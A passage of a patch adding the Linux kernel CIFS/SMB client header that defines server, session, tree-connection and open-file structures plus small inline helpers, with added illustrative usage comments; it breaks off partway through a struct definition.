++	struct cifs_sb_info *cifs_sb;
++	struct smb3_fs_context *ctx;
++	int flags;
++};
++
++static inline unsigned int
++get_rfc1002_length(void *buf)
++{
++	return be32_to_cpu(*((__be32 *)buf)) & 0xffffff;
++}
++
++static inline void
++inc_rfc1001_len(void *buf, int count)
++{
++	be32_add_cpu((__be32 *)buf, count);
++}
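++
++/*
++ * Illustrative sketch (not part of the original patch): the first 4 bytes
++ * of each message are the RFC 1001/1002 session header - a type byte
++ * followed by a 24-bit big-endian payload length - which is why the
++ * helpers above mask with 0xffffff. A hypothetical framing example:
++ *
++ *	char buf[128] = {0};
++ *
++ *	*(__be32 *)buf = cpu_to_be32(100);	// type 0, length 100
++ *	inc_rfc1001_len(buf, 4);		// four more payload bytes
++ *	// get_rfc1002_length(buf) now returns 104
++ */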
++
++struct TCP_Server_Info {
++	struct list_head tcp_ses_list;
++	struct list_head smb_ses_list;
++	spinlock_t srv_lock;  /* protect anything here that is not protected */
++	__u64 conn_id; /* connection identifier (useful for debugging) */
++	int srv_count; /* reference counter */
++	/* 15 character server name + 0x20 16th byte indicating type = srv */
++	char server_RFC1001_name[RFC1001_NAME_LEN_WITH_NULL];
++	struct smb_version_operations	*ops;
++	struct smb_version_values	*vals;
++	/* updates to tcpStatus protected by cifs_tcp_ses_lock */
++	enum statusEnum tcpStatus; /* what we think the status is */
++	char *hostname; /* hostname portion of UNC string */
++	struct socket *ssocket;
++	struct sockaddr_storage dstaddr;
++	struct sockaddr_storage srcaddr; /* locally bind to this IP */
++#ifdef CONFIG_NET_NS
++	struct net *net;
++#endif
++	wait_queue_head_t response_q;
++	wait_queue_head_t request_q; /* if more than maxmpx to srvr must block*/
++	spinlock_t mid_lock;  /* protect mid queue and its entries */
++	struct list_head pending_mid_q;
++	bool noblocksnd;		/* use blocking sendmsg */
++	bool noautotune;		/* do not autotune send buf sizes */
++	bool nosharesock;
++	bool tcp_nodelay;
++	unsigned int credits;  /* send no more requests at once */
++	unsigned int max_credits; /* can override large 32000 default at mnt */
++	unsigned int in_flight;  /* number of requests on the wire to server */
++	unsigned int max_in_flight; /* max number of requests that were on wire */
++	spinlock_t req_lock;  /* protect the two values above */
++	struct mutex _srv_mutex;
++	unsigned int nofs_flag;
++	struct task_struct *tsk;
++	char server_GUID[16];
++	__u16 sec_mode;
++	bool sign; /* is signing enabled on this connection? */
++	bool ignore_signature:1; /* skip validation of signatures in SMB2/3 rsp */
++	bool session_estab; /* mark when very first sess is established */
++	int echo_credits;  /* echo reserved slots */
++	int oplock_credits;  /* oplock break reserved slots */
++	bool echoes:1; /* enable echoes */
++	__u8 client_guid[SMB2_CLIENT_GUID_SIZE]; /* Client GUID */
++	u16 dialect; /* dialect index that server chose */
++	bool oplocks:1; /* enable oplocks */
++	unsigned int maxReq;	/* Clients should submit no more */
++	/* than maxReq distinct unanswered SMBs to the server when using  */
++	/* multiplexed reads or writes (for SMB1/CIFS only, not SMB2/SMB3) */
++	unsigned int maxBuf;	/* maxBuf specifies the maximum */
++	/* message size the server can send or receive for non-raw SMBs */
++	/* maxBuf is returned by SMB NegotiateProtocol so maxBuf is only 0 */
++	/* when socket is setup (and during reconnect) before NegProt sent */
++	unsigned int max_rw;	/* maxRw specifies the maximum */
++	/* message size the server can send or receive for */
++	/* SMB_COM_WRITE_RAW or SMB_COM_READ_RAW. */
++	unsigned int capabilities; /* selective disabling of caps by smb sess */
++	int timeAdj;  /* Adjust for difference in server time zone in sec */
++	__u64 CurrentMid;         /* multiplex id - rotating counter, protected by GlobalMid_Lock */
++	char cryptkey[CIFS_CRYPTO_KEY_SIZE]; /* used by ntlm, ntlmv2 etc */
++	/* 16th byte of RFC1001 workstation name is always null */
++	char workstation_RFC1001_name[RFC1001_NAME_LEN_WITH_NULL];
++	__u32 sequence_number; /* for signing, protected by srv_mutex */
++	__u32 reconnect_instance; /* incremented on each reconnect */
++	struct session_key session_key;
++	unsigned long lstrp; /* when we got last response from this server */
++	struct cifs_secmech secmech; /* crypto sec mech functs, descriptors */
++#define	CIFS_NEGFLAVOR_UNENCAP	1	/* wct == 17, but no ext_sec */
++#define	CIFS_NEGFLAVOR_EXTENDED	2	/* wct == 17, ext_sec bit set */
++	char	negflavor;	/* NEGOTIATE response flavor */
++	/* extended security flavors that server supports */
++	bool	sec_ntlmssp;		/* supports NTLMSSP */
++	bool	sec_kerberosu2u;	/* supports U2U Kerberos */
++	bool	sec_kerberos;		/* supports plain Kerberos */
++	bool	sec_mskerberos;		/* supports legacy MS Kerberos */
++	bool	large_buf;		/* is current buffer large? */
++	/* use SMBD connection instead of socket */
++	bool	rdma;
++	/* point to the SMBD connection if RDMA is used instead of socket */
++	struct smbd_connection *smbd_conn;
++	struct delayed_work	echo; /* echo ping workqueue job */
++	struct delayed_work	resolve; /* dns resolution workqueue job */
++	char	*smallbuf;	/* pointer to current "small" buffer */
++	char	*bigbuf;	/* pointer to current "big" buffer */
++	/* Total size of this PDU. Only valid from cifs_demultiplex_thread */
++	unsigned int pdu_size;
++	unsigned int total_read; /* total amount of data read in this pass */
++	atomic_t in_send; /* requests trying to send */
++	atomic_t num_waiters;   /* blocked waiting to get in sendrecv */
++#ifdef CONFIG_CIFS_STATS2
++	atomic_t num_cmds[NUMBER_OF_SMB2_COMMANDS]; /* total requests by cmd */
++	atomic_t smb2slowcmd[NUMBER_OF_SMB2_COMMANDS]; /* count resps > 1 sec */
++	__u64 time_per_cmd[NUMBER_OF_SMB2_COMMANDS]; /* total time per cmd */
++	__u32 slowest_cmd[NUMBER_OF_SMB2_COMMANDS];
++	__u32 fastest_cmd[NUMBER_OF_SMB2_COMMANDS];
++#endif /* STATS2 */
++	unsigned int	max_read;
++	unsigned int	max_write;
++	unsigned int	min_offload;
++	__le16	compress_algorithm;
++	__u16	signing_algorithm;
++	__le16	cipher_type;
++	 /* save initial negprot hash */
++	__u8	preauth_sha_hash[SMB2_PREAUTH_HASH_SIZE];
++	bool	signing_negotiated; /* true if valid signing context rcvd from server */
++	bool	posix_ext_supported;
++	struct delayed_work reconnect; /* reconnect workqueue job */
++	struct mutex reconnect_mutex; /* prevent simultaneous reconnects */
++	unsigned long echo_interval;
++
++	/*
++	 * Number of targets available for reconnect. The more targets
++	 * the more tasks have to wait to let the demultiplex thread
++	 * reconnect.
++	 */
++	int nr_targets;
++	bool noblockcnt; /* use non-blocking connect() */
++
++	/*
++	 * If this is a session channel,
++	 * primary_server holds the ref-counted
++	 * pointer to primary channel connection for the session.
++	 */
++#define CIFS_SERVER_IS_CHAN(server)	(!!(server)->primary_server)
++	struct TCP_Server_Info *primary_server;
++
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	bool use_swn_dstaddr;
++	struct sockaddr_storage swn_dstaddr;
++#endif
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	bool is_dfs_conn; /* if a dfs connection */
++	struct mutex refpath_lock; /* protects leaf_fullpath */
++	/*
++	 * Canonical DFS full paths that were used to chase referrals in mount and reconnect.
++	 *
++	 * origin_fullpath: first or original referral path
++	 * leaf_fullpath: last referral path (might be changed due to nested links in reconnect)
++	 *
++	 * current_fullpath: pointer to either origin_fullpath or leaf_fullpath
++	 * NOTE: cannot be accessed outside cifs_reconnect() and smb2_reconnect()
++	 *
++	 * format: \\HOST\SHARE\[OPTIONAL PATH]
++	 */
++	char *origin_fullpath, *leaf_fullpath, *current_fullpath;
++#endif
++};
++
++static inline bool is_smb1(struct TCP_Server_Info *server)
++{
++	return HEADER_PREAMBLE_SIZE(server) != 0;
++}
++
++static inline void cifs_server_lock(struct TCP_Server_Info *server)
++{
++	unsigned int nofs_flag = memalloc_nofs_save();
++
++	mutex_lock(&server->_srv_mutex);
++	server->nofs_flag = nofs_flag;
++}
++
++static inline void cifs_server_unlock(struct TCP_Server_Info *server)
++{
++	unsigned int nofs_flag = server->nofs_flag;
++
++	mutex_unlock(&server->_srv_mutex);
++	memalloc_nofs_restore(nofs_flag);
++}
++
++struct cifs_credits {
++	unsigned int value;
++	unsigned int instance;
++};
++
++static inline unsigned int
++in_flight(struct TCP_Server_Info *server)
++{
++	unsigned int num;
++	spin_lock(&server->req_lock);
++	num = server->in_flight;
++	spin_unlock(&server->req_lock);
++	return num;
++}
++
++static inline bool
++has_credits(struct TCP_Server_Info *server, int *credits, int num_credits)
++{
++	int num;
++	spin_lock(&server->req_lock);
++	num = *credits;
++	spin_unlock(&server->req_lock);
++	return num >= num_credits;
++}
++
++static inline void
++add_credits(struct TCP_Server_Info *server, const struct cifs_credits *credits,
++	    const int optype)
++{
++	server->ops->add_credits(server, credits, optype);
++}
++
++static inline void
++add_credits_and_wake_if(struct TCP_Server_Info *server,
++			const struct cifs_credits *credits, const int optype)
++{
++	if (credits->value) {
++		server->ops->add_credits(server, credits, optype);
++		wake_up(&server->request_q);
++	}
++}
++
++static inline void
++set_credits(struct TCP_Server_Info *server, const int val)
++{
++	server->ops->set_credits(server, val);
++}
++
++static inline int
++adjust_credits(struct TCP_Server_Info *server, struct cifs_credits *credits,
++	       const unsigned int payload_size)
++{
++	return server->ops->adjust_credits ?
++		server->ops->adjust_credits(server, credits, payload_size) : 0;
++}
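++
++/*
++ * Illustrative sketch (not part of the original patch): the typical credit
++ * flow around a request, assuming credits were obtained earlier (e.g. via
++ * server->ops->wait_mtu_credits). Unused credits must go back through
++ * add_credits_and_wake_if() so that blocked senders are woken:
++ *
++ *	struct cifs_credits credits = { .value = 0, .instance = 0 };
++ *
++ *	// ... take credits, send the request ...
++ *	// on error or completion, return whatever is left:
++ *	add_credits_and_wake_if(server, &credits, 0);
++ */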
++
++static inline __le64
++get_next_mid64(struct TCP_Server_Info *server)
++{
++	return cpu_to_le64(server->ops->get_next_mid(server));
++}
++
++static inline __le16
++get_next_mid(struct TCP_Server_Info *server)
++{
++	__u16 mid = server->ops->get_next_mid(server);
++	/*
++	 * The value in the SMB header should be little endian for easy
++	 * on-the-wire decoding.
++	 */
++	return cpu_to_le16(mid);
++}
++
++static inline void
++revert_current_mid(struct TCP_Server_Info *server, const unsigned int val)
++{
++	if (server->ops->revert_current_mid)
++		server->ops->revert_current_mid(server, val);
++}
++
++static inline void
++revert_current_mid_from_hdr(struct TCP_Server_Info *server,
++			    const struct smb2_hdr *shdr)
++{
++	unsigned int num = le16_to_cpu(shdr->CreditCharge);
++
++	return revert_current_mid(server, num > 0 ? num : 1);
++}
++
++static inline __u16
++get_mid(const struct smb_hdr *smb)
++{
++	return le16_to_cpu(smb->Mid);
++}
++
++static inline bool
++compare_mid(__u16 mid, const struct smb_hdr *smb)
++{
++	return mid == le16_to_cpu(smb->Mid);
++}
++
++/*
++ * When the server supports very large reads and writes via POSIX extensions,
++ * we can allow up to 2^24-1, minus the size of a READ/WRITE_AND_X header, not
++ * including the RFC1001 length.
++ *
++ * Note that this might make for "interesting" allocation problems during
++ * writeback, however, as we have to allocate an array of pointers for the
++ * pages. A 16M write means ~32kb page array with PAGE_SIZE == 4096.
++ *
++ * For reads, there is a similar problem as we need to allocate an array
++ * of kvecs to handle the receive, though that should only need to be done
++ * once.
++ */
++#define CIFS_MAX_WSIZE ((1<<24) - 1 - sizeof(WRITE_REQ) + 4)
++#define CIFS_MAX_RSIZE ((1<<24) - sizeof(READ_RSP) + 4)
++
++/*
++ * When the server doesn't allow large posix writes, only allow a rsize/wsize
++ * of 2^17-1 minus the size of the call header. That allows for a read or
++ * write up to the maximum size described by RFC1002.
++ */
++#define CIFS_MAX_RFC1002_WSIZE ((1<<17) - 1 - sizeof(WRITE_REQ) + 4)
++#define CIFS_MAX_RFC1002_RSIZE ((1<<17) - 1 - sizeof(READ_RSP) + 4)
++
++#define CIFS_DEFAULT_IOSIZE (1024 * 1024)
++
++/*
++ * Windows only supports a max of 60kb reads and 65535 byte writes. Default to
++ * those values when posix extensions aren't in force. In actuality here, we
++ * use 65536 to allow for a write that is a multiple of 4k. Most servers seem
++ * to be ok with the extra byte even though Windows doesn't send writes that
++ * are that large.
++ *
++ * Citation:
++ *
++ * https://blogs.msdn.com/b/openspecification/archive/2009/04/10/smb-maximum-transmit-buffer-size-and-performance-tuning.aspx
++ */
++#define CIFS_DEFAULT_NON_POSIX_RSIZE (60 * 1024)
++#define CIFS_DEFAULT_NON_POSIX_WSIZE (65536)
++
++/*
++ * Macros to allow the TCP_Server_Info->net field and related code to drop out
++ * when CONFIG_NET_NS isn't set.
++ */
++
++#ifdef CONFIG_NET_NS
++
++static inline struct net *cifs_net_ns(struct TCP_Server_Info *srv)
++{
++	return srv->net;
++}
++
++static inline void cifs_set_net_ns(struct TCP_Server_Info *srv, struct net *net)
++{
++	srv->net = net;
++}
++
++#else
++
++static inline struct net *cifs_net_ns(struct TCP_Server_Info *srv)
++{
++	return &init_net;
++}
++
++static inline void cifs_set_net_ns(struct TCP_Server_Info *srv, struct net *net)
++{
++}
++
++#endif
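++
++/*
++ * Illustrative sketch (not part of the original patch): using the
++ * accessors keeps callers identical with or without CONFIG_NET_NS, e.g.
++ * creating the transport socket in the server's namespace (hypothetical
++ * usage; the real call site lives in the connect code, not here):
++ *
++ *	rc = __sock_create(cifs_net_ns(server), AF_INET, SOCK_STREAM,
++ *			   IPPROTO_TCP, &socket, 1);
++ */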
++
++struct cifs_server_iface {
++	struct list_head iface_head;
++	struct kref refcount;
++	size_t speed;
++	unsigned int rdma_capable : 1;
++	unsigned int rss_capable : 1;
++	unsigned int is_active : 1; /* unset if non-existent */
++	struct sockaddr_storage sockaddr;
++};
++
++/* release iface when last ref is dropped */
++static inline void
++release_iface(struct kref *ref)
++{
++	struct cifs_server_iface *iface = container_of(ref,
++						       struct cifs_server_iface,
++						       refcount);
++	list_del_init(&iface->iface_head);
++	kfree(iface);
++}
++
++/*
++ * Compare two interfaces a and b.
++ * Return 0 if everything matches.
++ * Return 1 if a has a higher link speed, or is rdma/rss capable when b
++ * is not (the sockaddr is the final tiebreak); return -1 otherwise.
++ */
++static inline int
++iface_cmp(struct cifs_server_iface *a, struct cifs_server_iface *b)
++{
++	int cmp_ret = 0;
++
++	WARN_ON(!a || !b);
++	if (a->speed == b->speed) {
++		if (a->rdma_capable == b->rdma_capable) {
++			if (a->rss_capable == b->rss_capable) {
++				cmp_ret = memcmp(&a->sockaddr, &b->sockaddr,
++						 sizeof(a->sockaddr));
++				if (!cmp_ret)
++					return 0;
++				else if (cmp_ret > 0)
++					return 1;
++				else
++					return -1;
++			} else if (a->rss_capable > b->rss_capable)
++				return 1;
++			else
++				return -1;
++		} else if (a->rdma_capable > b->rdma_capable)
++			return 1;
++		else
++			return -1;
++	} else if (a->speed > b->speed)
++		return 1;
++	else
++		return -1;
++}
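++
++/*
++ * Illustrative sketch (not part of the original patch): since iface_cmp()
++ * imposes a total order, a caller can keep an interface list sorted
++ * best-first, e.g. when inserting a hypothetical new entry:
++ *
++ *	struct cifs_server_iface *iface;
++ *
++ *	list_for_each_entry(iface, &ses->iface_list, iface_head)
++ *		if (iface_cmp(new_iface, iface) > 0)
++ *			break;	// insert new_iface before this one
++ */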
++
++struct cifs_chan {
++	unsigned int in_reconnect : 1; /* if session setup in progress for this channel */
++	struct TCP_Server_Info *server;
++	struct cifs_server_iface *iface; /* interface in use */
++	__u8 signkey[SMB3_SIGN_KEY_SIZE];
++};
++
++/*
++ * Session structure.  One of these for each uid session with a particular host
++ */
++struct cifs_ses {
++	struct list_head smb_ses_list;
++	struct list_head rlist; /* reconnect list */
++	struct list_head tcon_list;
++	struct cifs_tcon *tcon_ipc;
++	spinlock_t ses_lock;  /* protect anything here that is not protected */
++	struct mutex session_mutex;
++	struct TCP_Server_Info *server;	/* pointer to server info */
++	int ses_count;		/* reference counter */
++	enum ses_status_enum ses_status;  /* updates protected by cifs_tcp_ses_lock */
++	unsigned overrideSecFlg;  /* if non-zero override global sec flags */
++	char *serverOS;		/* name of operating system underlying server */
++	char *serverNOS;	/* name of network operating system of server */
++	char *serverDomain;	/* security realm of server */
++	__u64 Suid;		/* remote smb uid  */
++	kuid_t linux_uid;	/* overriding owner of files on the mount */
++	kuid_t cred_uid;	/* owner of credentials */
++	unsigned int capabilities;
++	char ip_addr[INET6_ADDRSTRLEN + 1]; /* Max ipv6 (or v4) addr string len */
++	char *user_name;	/* must not be null except during init of sess;
++				   filled in after mount option parsing */
++	char *domainName;
++	char *password;
++	char workstation_name[CIFS_MAX_WORKSTATION_LEN];
++	struct session_key auth_key;
++	struct ntlmssp_auth *ntlmssp; /* ciphertext, flags, server challenge */
++	enum securityEnum sectype; /* what security flavor was specified? */
++	bool sign;		/* is signing required? */
++	bool domainAuto:1;
++	__u16 session_flags;
++	__u8 smb3signingkey[SMB3_SIGN_KEY_SIZE];
++	__u8 smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
++	__u8 smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
++	__u8 preauth_sha_hash[SMB2_PREAUTH_HASH_SIZE];
++
++	/*
++	 * Network interfaces available on the server this session is
++	 * connected to.
++	 *
++	 * Other channels can be opened by connecting and binding this
++	 * session to interfaces from this list.
++	 *
++	 * iface_lock should be taken when accessing any of these fields
++	 */
++	spinlock_t iface_lock;
++	/* ========= begin: protected by iface_lock ======== */
++	struct list_head iface_list;
++	size_t iface_count;
++	unsigned long iface_last_update; /* jiffies */
++	/* ========= end: protected by iface_lock ======== */
++
++	spinlock_t chan_lock;
++	/* ========= begin: protected by chan_lock ======== */
++#define CIFS_MAX_CHANNELS 16
++#define CIFS_ALL_CHANNELS_SET(ses)	\
++	((1UL << (ses)->chan_count) - 1)
++#define CIFS_ALL_CHANS_GOOD(ses)		\
++	(!(ses)->chans_need_reconnect)
++#define CIFS_ALL_CHANS_NEED_RECONNECT(ses)	\
++	((ses)->chans_need_reconnect == CIFS_ALL_CHANNELS_SET(ses))
++#define CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses)	\
++	((ses)->chans_need_reconnect = CIFS_ALL_CHANNELS_SET(ses))
++#define CIFS_CHAN_NEEDS_RECONNECT(ses, index)	\
++	test_bit((index), &(ses)->chans_need_reconnect)
++#define CIFS_CHAN_IN_RECONNECT(ses, index)	\
++	((ses)->chans[(index)].in_reconnect)
++
++	struct cifs_chan chans[CIFS_MAX_CHANNELS];
++	size_t chan_count;
++	size_t chan_max;
++	atomic_t chan_seq; /* round robin state */
++
++	/*
++	 * chans_need_reconnect is a bitmap indicating which of the channels
++	 * under this smb session need to be reconnected.
++	 * If this is not a multichannel session, only one bit will be used.
++	 *
++	 * We will ask for sess and tcon reconnection only if all the
++	 * channels are marked as needing reconnection. This lets the
++	 * sessions on top stay alive as long as any of the channels
++	 * below is still active.
++	 */
++	unsigned long chans_need_reconnect;
++	/* ========= end: protected by chan_lock ======== */
++};
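++
++/*
++ * Illustrative sketch (not part of the original patch): chans_need_reconnect
++ * is an ordinary bitmap, so the channel macros above reduce to bit tests,
++ * e.g. walking the channels that still need to be re-established:
++ *
++ *	unsigned int i;
++ *
++ *	spin_lock(&ses->chan_lock);
++ *	for (i = 0; i < ses->chan_count; i++)
++ *		if (CIFS_CHAN_NEEDS_RECONNECT(ses, i))
++ *			; // channel i must be reconnected
++ *	spin_unlock(&ses->chan_lock);
++ */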
++
++static inline bool
++cap_unix(struct cifs_ses *ses)
++{
++	return ses->server->vals->cap_unix & ses->capabilities;
++}
++
++/*
++ * common struct for holding inode info when searching for or updating an
++ * inode with new info
++ */
++
++#define CIFS_FATTR_DFS_REFERRAL		0x1
++#define CIFS_FATTR_DELETE_PENDING	0x2
++#define CIFS_FATTR_NEED_REVAL		0x4
++#define CIFS_FATTR_INO_COLLISION	0x8
++#define CIFS_FATTR_UNKNOWN_NLINK	0x10
++#define CIFS_FATTR_FAKE_ROOT_INO	0x20
++
++struct cifs_fattr {
++	u32		cf_flags;
++	u32		cf_cifsattrs;
++	u64		cf_uniqueid;
++	u64		cf_eof;
++	u64		cf_bytes;
++	u64		cf_createtime;
++	kuid_t		cf_uid;
++	kgid_t		cf_gid;
++	umode_t		cf_mode;
++	dev_t		cf_rdev;
++	unsigned int	cf_nlink;
++	unsigned int	cf_dtype;
++	struct timespec64 cf_atime;
++	struct timespec64 cf_mtime;
++	struct timespec64 cf_ctime;
++	u32             cf_cifstag;
++	char            *cf_symlink_target;
++};
++
++/*
++ * there is one of these for each connection to a resource on a particular
++ * session
++ */
++struct cifs_tcon {
++	struct list_head tcon_list;
++	int tc_count;
++	struct list_head rlist; /* reconnect list */
++	spinlock_t tc_lock;  /* protect anything here that is not protected */
++	atomic_t num_local_opens;  /* num of all opens including disconnected */
++	atomic_t num_remote_opens; /* num of all network opens on server */
++	struct list_head openFileList;
++	spinlock_t open_file_lock; /* protects list above */
++	struct cifs_ses *ses;	/* pointer to session associated with */
++	char tree_name[MAX_TREE_SIZE + 1]; /* UNC name of resource in ASCII */
++	char *nativeFileSystem;
++	char *password;		/* for share-level security */
++	__u32 tid;		/* The 4 byte tree id */
++	__u16 Flags;		/* optional support bits */
++	enum tid_status_enum status;
++	atomic_t num_smbs_sent;
++	union {
++		struct {
++			atomic_t num_writes;
++			atomic_t num_reads;
++			atomic_t num_flushes;
++			atomic_t num_oplock_brks;
++			atomic_t num_opens;
++			atomic_t num_closes;
++			atomic_t num_deletes;
++			atomic_t num_mkdirs;
++			atomic_t num_posixopens;
++			atomic_t num_posixmkdirs;
++			atomic_t num_rmdirs;
++			atomic_t num_renames;
++			atomic_t num_t2renames;
++			atomic_t num_ffirst;
++			atomic_t num_fnext;
++			atomic_t num_fclose;
++			atomic_t num_hardlinks;
++			atomic_t num_symlinks;
++			atomic_t num_locks;
++			atomic_t num_acl_get;
++			atomic_t num_acl_set;
++		} cifs_stats;
++		struct {
++			atomic_t smb2_com_sent[NUMBER_OF_SMB2_COMMANDS];
++			atomic_t smb2_com_failed[NUMBER_OF_SMB2_COMMANDS];
++		} smb2_stats;
++	} stats;
++	__u64    bytes_read;
++	__u64    bytes_written;
++	spinlock_t stat_lock;  /* protects the two fields above */
++	FILE_SYSTEM_DEVICE_INFO fsDevInfo;
++	FILE_SYSTEM_ATTRIBUTE_INFO fsAttrInfo; /* ok if fs name truncated */
++	FILE_SYSTEM_UNIX_INFO fsUnixInfo;
++	bool ipc:1;   /* set if connection to IPC$ share (always also pipe) */
++	bool pipe:1;  /* set if connection to pipe share */
++	bool print:1; /* set if connection to printer share */
++	bool retry:1;
++	bool nocase:1;
++	bool nohandlecache:1; /* can turn off if server has resource problems */
++	bool nodelete:1;
++	bool seal:1;      /* transport encryption for this mounted share */
++	bool unix_ext:1;  /* if false, disable Linux extensions to CIFS protocol
++				for this mount even if the server supports them */
++	bool posix_extensions; /* if true SMB3.11 posix extensions enabled */
++	bool local_lease:1; /* check leases (only) on local system not remote */
++	bool broken_posix_open; /* e.g. Samba server versions < 3.3.2, 3.2.9 */
++	bool broken_sparse_sup; /* if server or share does not support sparse */
++	bool need_reconnect:1; /* connection reset, tid now invalid */
++	bool need_reopen_files:1; /* need to reopen tcon file handles */
++	bool use_resilient:1; /* use resilient instead of durable handles */
++	bool use_persistent:1; /* use persistent instead of durable handles */
++	bool no_lease:1;    /* Do not request leases on files or directories */
++	bool use_witness:1; /* use witness protocol */
++	__le32 capabilities;
++	__u32 share_flags;
++	__u32 maximal_access;
++	__u32 vol_serial_number;
++	__le64 vol_create_time;
++	__u64 snapshot_time; /* for timewarp tokens - timestamp of snapshot */
++	__u32 handle_timeout; /* persistent and durable handle timeout in ms */
++	__u32 ss_flags;		/* sector size flags */
++	__u32 perf_sector_size; /* best sector size for perf */
++	__u32 max_chunks;
++	__u32 max_bytes_chunk;
++	__u32 max_bytes_copy;
++#ifdef CONFIG_CIFS_FSCACHE
++	u64 resource_id;		/* server resource id */
++	struct fscache_volume *fscache;	/* cookie for share */
++#endif
++	struct list_head pending_opens;	/* list of incomplete opens */
++	struct cached_fids *cfids;
++	/* BB add field for back pointer to sb struct(s)? */
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	struct list_head ulist; /* cache update list */
++#endif
++	struct delayed_work	query_interfaces; /* query interfaces workqueue job */
++};
++
++/*
++ * This is a refcounted and timestamped container for a tcon pointer. The
++ * container holds a tcon reference. It is considered safe to free one of
++ * these when the tl_count goes to 0. The tl_time is the time of the last
++ * "get" on the container.
++ */
++struct tcon_link {
++	struct rb_node		tl_rbnode;
++	kuid_t			tl_uid;
++	unsigned long		tl_flags;
++#define TCON_LINK_MASTER	0
++#define TCON_LINK_PENDING	1
++#define TCON_LINK_IN_TREE	2
++	unsigned long		tl_time;
++	atomic_t		tl_count;
++	struct cifs_tcon	*tl_tcon;
++};
++
++extern struct tcon_link *cifs_sb_tlink(struct cifs_sb_info *cifs_sb);
++extern void smb3_free_compound_rqst(int num_rqst, struct smb_rqst *rqst);
++
++static inline struct cifs_tcon *
++tlink_tcon(struct tcon_link *tlink)
++{
++	return tlink->tl_tcon;
++}
++
++static inline struct tcon_link *
++cifs_sb_master_tlink(struct cifs_sb_info *cifs_sb)
++{
++	return cifs_sb->master_tlink;
++}
++
++extern void cifs_put_tlink(struct tcon_link *tlink);
++
++static inline struct tcon_link *
++cifs_get_tlink(struct tcon_link *tlink)
++{
++	if (tlink && !IS_ERR(tlink))
++		atomic_inc(&tlink->tl_count);
++	return tlink;
++}
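++
++/*
++ * Illustrative sketch (not part of the original patch): the usual tlink
++ * get/use/put pattern for multiuser mounts:
++ *
++ *	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++ *
++ *	if (IS_ERR(tlink))
++ *		return PTR_ERR(tlink);
++ *	// ... operate on tlink_tcon(tlink) ...
++ *	cifs_put_tlink(tlink);
++ */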
++
++/* This function is always expected to succeed */
++extern struct cifs_tcon *cifs_sb_master_tcon(struct cifs_sb_info *cifs_sb);
++
++#define CIFS_OPLOCK_NO_CHANGE 0xfe
++
++struct cifs_pending_open {
++	struct list_head olist;
++	struct tcon_link *tlink;
++	__u8 lease_key[16];
++	__u32 oplock;
++};
++
++struct cifs_deferred_close {
++	struct list_head dlist;
++	struct tcon_link *tlink;
++	__u16  netfid;
++	__u64  persistent_fid;
++	__u64  volatile_fid;
++};
++
++/*
++ * This info hangs off the cifsFileInfo structure, pointed to by llist.
++ * This is used to track byte stream locks on the file
++ */
++struct cifsLockInfo {
++	struct list_head llist;	/* pointer to next cifsLockInfo */
++	struct list_head blist; /* pointer to locks blocked on this */
++	wait_queue_head_t block_q;
++	__u64 offset;
++	__u64 length;
++	__u32 pid;
++	__u16 type;
++	__u16 flags;
++};
++
++/*
++ * One of these for each open instance of a file
++ */
++struct cifs_search_info {
++	loff_t index_of_last_entry;
++	__u16 entries_in_buffer;
++	__u16 info_level;
++	__u32 resume_key;
++	char *ntwrk_buf_start;
++	char *srch_entries_start;
++	char *last_entry;
++	const char *presume_name;
++	unsigned int resume_name_len;
++	bool endOfSearch:1;
++	bool emptyDir:1;
++	bool unicode:1;
++	bool smallBuf:1; /* so we know which buf_release function to call */
++};
++
++#define ACL_NO_MODE	((umode_t)(-1))
++struct cifs_open_parms {
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb;
++	int disposition;
++	int desired_access;
++	int create_options;
++	const char *path;
++	struct cifs_fid *fid;
++	umode_t mode;
++	bool reconnect:1;
++};
++
++struct cifs_fid {
++	__u16 netfid;
++	__u64 persistent_fid;	/* persist file id for smb2 */
++	__u64 volatile_fid;	/* volatile file id for smb2 */
++	__u8 lease_key[SMB2_LEASE_KEY_SIZE];	/* lease key for smb2 */
++	__u8 create_guid[16];
++	__u32 access;
++	struct cifs_pending_open *pending_open;
++	unsigned int epoch;
++#ifdef CONFIG_CIFS_DEBUG2
++	__u64 mid;
++#endif /* CIFS_DEBUG2 */
++	bool purge_cache;
++};
++
++struct cifs_fid_locks {
++	struct list_head llist;
++	struct cifsFileInfo *cfile;	/* fid that owns locks */
++	struct list_head locks;		/* locks held by fid above */
++};
++
++struct cifsFileInfo {
++	/* following two lists are protected by tcon->open_file_lock */
++	struct list_head tlist;	/* pointer to next fid owned by tcon */
++	struct list_head flist;	/* next fid (file instance) for this inode */
++	/* lock list below protected by cifsi->lock_sem */
++	struct cifs_fid_locks *llist;	/* brlocks held by this fid */
++	kuid_t uid;		/* allows finding which FileInfo structure */
++	__u32 pid;		/* process id who opened file */
++	struct cifs_fid fid;	/* file id from remote */
++	struct list_head rlist; /* reconnect list */
++	/* BB add lock scope info here if needed */
++	/* lock scope id (0 if none) */
++	struct dentry *dentry;
++	struct tcon_link *tlink;
++	unsigned int f_flags;
++	bool invalidHandle:1;	/* file closed via session abend */
++	bool swapfile:1;
++	bool oplock_break_cancelled:1;
++	unsigned int oplock_epoch; /* epoch from the lease break */
++	__u32 oplock_level; /* oplock/lease level from the lease break */
++	int count;
++	spinlock_t file_info_lock; /* protects four flag/count fields above */
++	struct mutex fh_mutex; /* prevents reopen race after dead ses*/
++	struct cifs_search_info srch_inf;
++	struct work_struct oplock_break; /* work for oplock breaks */
++	struct work_struct put; /* work for the final part of _put */
++	struct delayed_work deferred;
++	bool deferred_close_scheduled; /* Flag to indicate close is scheduled */
++	char *symlink_target;
++};
++
++struct cifs_io_parms {
++	__u16 netfid;
++	__u64 persistent_fid;	/* persist file id for smb2 */
++	__u64 volatile_fid;	/* volatile file id for smb2 */
++	__u32 pid;
++	__u64 offset;
++	unsigned int length;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++};
++
++struct cifs_aio_ctx {
++	struct kref		refcount;
++	struct list_head	list;
++	struct mutex		aio_mutex;
++	struct completion	done;
++	struct iov_iter		iter;
++	struct kiocb		*iocb;
++	struct cifsFileInfo	*cfile;
++	struct bio_vec		*bv;
++	loff_t			pos;
++	unsigned int		npages;
++	ssize_t			rc;
++	unsigned int		len;
